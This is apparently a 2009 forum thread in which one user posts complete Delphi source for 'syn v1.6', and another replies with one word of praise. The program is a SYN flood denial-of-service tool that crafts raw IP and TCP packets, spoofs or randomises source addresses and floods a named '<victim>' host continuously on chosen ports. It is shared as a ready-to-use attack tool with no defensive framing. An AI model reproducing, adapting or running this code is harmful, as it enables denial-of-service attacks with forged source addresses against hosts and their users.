Gonzalez Posted September 29, 2009 Report Share Posted September 29, 2009 program syn;{$APPTYPE CONSOLE}uses Windows, Winsock;const Banner = #13#10'syn v1.6 [14 Aug 2003]'#13#10#13#10 + 'http://www.loranbase.com'#13#10;type TPorts = array of Word; TSynOptions = packed record Delay: Cardinal; DstPorts: TPorts; SockAddr: TSockAddrIn; Num: Cardinal; RandomSeek: Integer; Sended: Cardinal; Socket: TSocket; SpoofIP: Cardinal; SrcPorts: TPorts; end; WordArray = ^TWordArray; TWordArray = array [0..0] of Word; PIPhdr = ^TIPhdr; TIPhdr = packed record ip_verlen: Byte; ip_tos: Byte; ip_len: Word; ip_id: Word; ip_off: Word; ip_ttl: Byte; ip_p: Byte; ip_sum: Word; ip_src: Cardinal; ip_dst: Cardinal; end; PTCPhdr = ^TTCPhdr; TTCPhdr = packed record tcp_src : Word; tcp_dst : Word; tcp_seq : Cardinal; tcp_ack : Cardinal; tcp_off : Byte; tcp_flags : Byte; tcp_win : Word; tcp_sum : Word; tcp_urp : Word; end; Ppseudohdr_tcp = ^Tpseudohdr_tcp; Tpseudohdr_tcp = packed record saddr : Cardinal; daddr : Cardinal; zero : Byte; protocol : Byte; length : Word; tcphdr : TTCPhdr; end;const Len = 40;var Buf: array [0..(Len - 1)] of Char; IPhdr: PIPhdr = @Buf[0]; TCPhdr: PTCPhdr = @Buf[20]; WSAData: TWSAData; i, j: integer; UseDelay: Boolean; SynOpt: TSynOptions; LastUpdate: Cardinal = 0;function CanUpdate(const DelayValue: Cardinal; const Force: Boolean): Boolean;begin Result := Force or ((GetTickCount - LastUpdate) >= DelayValue); if Result then LastUpdate := GetTickCount;end;function StrtoInt(const S: string): integer;var E: integer;begin Val(S, Result, E);end;function InttoStr(const Value: integer): string;var S: string[11];begin Str(Value, S); Result := S;end;function StrToIntDef(const S: string; Default: integer): integer;var E: integer;begin Val(S, Result, E); if E <> 0 then Result := Default;end;function ExtractFileName(const Path: string): string;var i, L: integer; Ch: Char;begin L := Length(Path); for i := L downto 1 do begin Ch := Path[i]; if (Ch = '\') or (Ch = '/') then begin Result := Copy(Path, i + 1, L - i); Break; end; end;end;function CheckSum(data: WordArray; size: Integer): Word;var i, sum: Integer;begin sum := 0; i := 0; while size > 1 do begin Inc(sum, data^[i]); Dec(size, 2); Inc(i); end; if size <> 0 then Inc(sum, data^[i]); sum := (sum shr 16) + (sum and $ffff); Inc(sum, sum shr 16); Result := not sum;end;function ValidPort(const Port: string): Boolean;var prt: Integer;begin prt := StrtoIntDef(Port, -1); Result := (prt > -1) and (prt < 65536); // a valid port must be between -1 and 65536end;function GetPorts(Ports: string): TPorts; procedure AddPort(const Port: string); begin if ValidPort(Port) then begin SetLength(Result, Length(Result) + 1); Result[High(Result)] := StrtoInt(Port); end else Writeln('Skipping invalid port: ' + Port); end;var i: Integer; S: string;begin i := Pos(',', Ports); while i > 0 do begin S := Copy(Ports, 1, i - 1); AddPort(S); Delete(Ports, 1, i); i := Pos(',', Ports); end; AddPort(Ports);end;function GetRandomValue(const Range: Integer): Integer; // function for getting different randombegin // values between very short times SynOpt.RandomSeek := (SynOpt.RandomSeek xor Range) + 1; Result := (Random(High(Integer)) xor SynOpt.RandomSeek) mod Range;end;function GetRandomIP: Cardinal;var IPArray: array [0..3] of Byte; i: Integer;begin for i := 0 to 3 do IPArray[i] := GetRandomValue(255) + 1; Move(IPArray, Result, Sizeof(Result));end;function Resolve(const host: PChar): Cardinal; // function for resolving host to ipvar InAddr: TInAddr; HostEnt: PHostEnt;begin InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it begin HostEnt := GetHostByName(host); if not Assigned(HostEnt) then // if couldn't resolve the host then exit begin Writeln('Error: Unable to resolve host: ' + host); Halt(0); end; Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); end; Result := InAddr.S_addr;end;procedure CreateSocket;begin SynOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if SynOpt.Socket = INVALID_SOCKET then begin Writeln('Error on creating socket'); Halt(0); end; if SetSockOpt(SynOpt.Socket, IPPROTO_IP, 2, '1', 4) <> 0 then begin // if can't set the IP_HDRINCL option then exit Writeln('Error: IP_HDRINCL'#13#10 + '(Note that this program only works on Windows XP)'); Halt(0); end;end;var SeudoBuf: array [0..31] of Char;procedure SendSyn(const sport, dport: Word); procedure SendSyn_FillIPhdr; begin IPhdr.ip_verlen := $45; IPhdr.ip_tos := 0; IPhdr.ip_len := htons(Len); IPhdr.ip_id := GetRandomValue(High(Word)) + 1; IPhdr.ip_ttl := 255; IPhdr.ip_p := 6; // 6 = TCP if SynOpt.SpoofIP = 0 then IPhdr.ip_src := GetRandomIP else IPhdr.ip_src := SynOpt.SpoofIP; IPhdr.ip_dst := SynOpt.SockAddr.sin_addr.S_addr; IPhdr.ip_sum := CheckSum(@IPhdr^, 20); end; procedure SendSyn_FillTCPhdr; var PSeudohdr: Ppseudohdr_tcp; begin if sport = 0 then TCPhdr.tcp_src := GetRandomValue(High(Word)) + 1 else TCPhdr.tcp_src := htons(sport); if dport = 0 then TCPhdr.tcp_dst := GetRandomValue(High(Word)) + 1 else TCPhdr.tcp_dst := htons(dport); TCPhdr.tcp_seq := GetRandomValue(High(Integer)) + 1; TCPhdr.tcp_ack := GetRandomValue(High(Integer)) + 1; TCPhdr.tcp_flags := $02; // 0x02 = syn flag TCPhdr.tcp_win := GetRandomValue(High(Word)) + 1; TCPhdr.tcp_urp := GetRandomValue(High(Word)) + 1; FillChar(SeudoBuf, Sizeof(SeudoBuf), 0); PSeudohdr := Ppseudohdr_tcp(@SeudoBuf); // for a correct tcp checksum PSeudohdr.saddr := IPhdr.ip_src; // we must calculate it with a pseudo header PSeudohdr.daddr := IPhdr.ip_dst; PSeudohdr.protocol := 6; PSeudohdr.length := htons(20); PSeudohdr.tcphdr := TCPhdr^; TCPhdr.tcp_sum := CheckSum(@PSeudohdr^, 32);end;begin FillChar(Buf, Len, 0); SendSyn_FillIPhdr; SendSyn_FillTCPhdr; Sendto(SynOpt.Socket, Buf, Len, 0, SynOpt.SockAddr, Sizeof(SynOpt.SockAddr));end;procedure SetDefaultOptions;begin SynOpt.SockAddr.sin_addr.S_addr := Resolve(PChar(ParamStr(1))); SetLength(SynOpt.DstPorts, 1); SynOpt.DstPorts[0] := 0; SynOpt.SockAddr.sin_family := AF_INET; SynOpt.SockAddr.sin_port := GetRandomValue(High(Word)) + 1; SetLength(SynOpt.SrcPorts, 1); SynOpt.SrcPorts[0] := 0;end;procedure SetParams;var i, pcount: Integer; pstr: string; Ch: Char;begin pcount := ParamCount; for i := 2 to pcount do begin pstr := ParamStr(i); Ch := #0; if Length(pstr) = 2 then begin if pstr[1] = '-' then Ch := pstr[2]; end; if Ch = #0 then Continue; case Ch of 'S': SynOpt.SpoofIP := Resolve(PChar(ParamStr(i + 1))); 'p': begin SynOpt.DstPorts := GetPorts(ParamStr(i + 1)); if Length(SynOpt.DstPorts) = 0 then begin Writeln('No valid ports found on the dst port list'); Halt(0); end; end; 's': begin SynOpt.SrcPorts := GetPorts(ParamStr(i + 1)); if Length(SynOpt.SrcPorts) = 0 then begin Writeln('No valid ports found on the src port list'); Halt(0); end; end; 'n': SynOpt.Num := StrtoIntDef(ParamStr(i + 1), 0); 'd': SynOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0); end; end;end;procedure Usage(const Path: string); begin Write( 'usage: ' + Path + ' <victim> [options]'#13#10#13#10 + 'Options:'#13#10 + ' -S: Spoof host (0 is random (default))'#13#10 + ' -p: Comma separated list of dest ports (0 is random (default))'#13#10 + ' -s: Comma separated list of src ports (0 is random (default))'#13#10 + ' -n: Num of packets (0 is continuous (default))'#13#10 + ' -d: Delay (in ms) (default 0)'#13#10 ); Halt(0);end;begin Writeln(Banner); if ParamCount < 1 then Usage(ExtractFileName(ParamStr(0))); WSAStartUp($0101, WSAData); FillChar(SynOpt, Sizeof(SynOpt), 0); CreateSocket; try Randomize; SetDefaultOptions; if ParamCount > 1 then SetParams; UseDelay := SynOpt.Delay > 0; repeat for i := 0 to High(SynOpt.DstPorts) do begin for j := 0 to High(SynOpt.SrcPorts) do begin SendSyn(SynOpt.SrcPorts[j], SynOpt.DstPorts[i]); if UseDelay then Sleep(SynOpt.Delay); end; end; Inc(SynOpt.Sended); if CanUpdate(50, SynOpt.Sended = SynOpt.Num) then SetConsoleTitle(PChar('Count: ' + InttoStr(SynOpt.Sended))); until SynOpt.Sended = SynOpt.Num; finally CloseSocket(SynOpt.Socket); WSACleanUp; end;end. Quote Link to comment Share on other sites More sharing options...
Fitty Posted September 29, 2009 Report Share Posted September 29, 2009 frumos Quote Link to comment Share on other sites More sharing options...